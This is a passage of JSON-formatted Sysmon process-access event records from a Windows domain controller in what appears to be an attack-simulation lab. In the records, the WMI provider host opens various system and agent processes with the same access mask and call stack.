RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","EventReceivedTime":"2020-08-01 05:52:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5633,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:48.703\r\nSourceProcessGUID: {A837DB8D-0330-5F25-0000-0010E0BB0A00}\r\nSourceProcessId: 1256\r\nSourceThreadId: 756\r\nSourceImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-001095B80200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\system32\\DFSRs.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:48.703","SourceProcessGUID":"{A837DB8D-0330-5F25-0000-0010E0BB0A00}","SourceProcessId":"1256","SourceThreadId":"756","SourceImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-001095B80200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\system32\\DFSRs.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","EventReceivedTime":"2020-08-01 05:52:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5634,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:48.703\r\nSourceProcessGUID: {A837DB8D-0330-5F25-0000-0010E0BB0A00}\r\nSourceProcessId: 1256\r\nSourceThreadId: 756\r\nSourceImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-0010E5B90200}\r\nTargetProcessId: 2616\r\nTargetImage: C:\\Program Files\\Amazon\\XenTools\\LiteAgent.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:48.703","SourceProcessGUID":"{A837DB8D-0330-5F25-0000-0010E0BB0A00}","SourceProcessId":"1256","SourceThreadId":"756","SourceImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-0010E5B90200}","TargetProcessId":"2616","TargetImage":"C:\\Program Files\\Amazon\\XenTools\\LiteAgent.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","EventReceivedTime":"2020-08-01 05:52:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5635,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:48.703\r\nSourceProcessGUID: {A837DB8D-0330-5F25-0000-0010E0BB0A00}\r\nSourceProcessId: 1256\r\nSourceThreadId: 756\r\nSourceImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-0010ECBA0200}\r\nTargetProcessId: 2640\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:48.703","SourceProcessGUID":"{A837DB8D-0330-5F25-0000-0010E0BB0A00}","SourceProcessId":"1256","SourceThreadId":"756","SourceImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-0010ECBA0200}","TargetProcessId":"2640","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","EventReceivedTime":"2020-08-01 05:52:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5636,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:48.703\r\nSourceProcessGUID: {A837DB8D-0330-5F25-0000-0010E0BB0A00}\r\nSourceProcessId: 1256\r\nSourceThreadId: 756\r\nSourceImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-001014BB0200}\r\nTargetProcessId: 2688\r\nTargetImage: C:\\Windows\\system32\\dns.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:48.703","SourceProcessGUID":"{A837DB8D-0330-5F25-0000-0010E0BB0A00}","SourceProcessId":"1256","SourceThreadId":"756","SourceImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-001014BB0200}","TargetProcessId":"2688","TargetImage":"C:\\Windows\\system32\\dns.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","EventReceivedTime":"2020-08-01 05:52:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5637,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:48.703\r\nSourceProcessGUID: {A837DB8D-0330-5F25-0000-0010E0BB0A00}\r\nSourceProcessId: 1256\r\nSourceThreadId: 756\r\nSourceImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:48.703","SourceProcessGUID":"{A837DB8D-0330-5F25-0000-0010E0BB0A00}","SourceProcessId":"1256","SourceThreadId":"756","SourceImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","EventReceivedTime":"2020-08-01 05:52:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5638,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:48.719\r\nSourceProcessGUID: {A837DB8D-0330-5F25-0000-0010E0BB0A00}\r\nSourceProcessId: 1256\r\nSourceThreadId: 756\r\nSourceImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-001037BE0200}\r\nTargetProcessId: 2468\r\nTargetImage: C:\\Program Files\\Amazon\\SSM\\amazon-ssm-agent.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:48.719","SourceProcessGUID":"{A837DB8D-0330-5F25-0000-0010E0BB0A00}","SourceProcessId":"1256","SourceThreadId":"756","SourceImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-001037BE0200}","TargetProcessId":"2468","TargetImage":"C:\\Program Files\\Amazon\\SSM\\amazon-ssm-agent.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","EventReceivedTime":"2020-08-01 05:52:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5639,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:48.719\r\nSourceProcessGUID: {A837DB8D-0330-5F25-0000-0010E0BB0A00}\r\nSourceProcessId: 1256\r\nSourceThreadId: 756\r\nSourceImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00102EBE0200}\r\nTargetProcessId: 2100\r\nTargetImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:48.719","SourceProcessGUID":"{A837DB8D-0330-5F25-0000-0010E0BB0A00}","SourceProcessId":"1256","SourceThreadId":"756","SourceImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00102EBE0200}","TargetProcessId":"2100","TargetImage":"C:\\Program Files 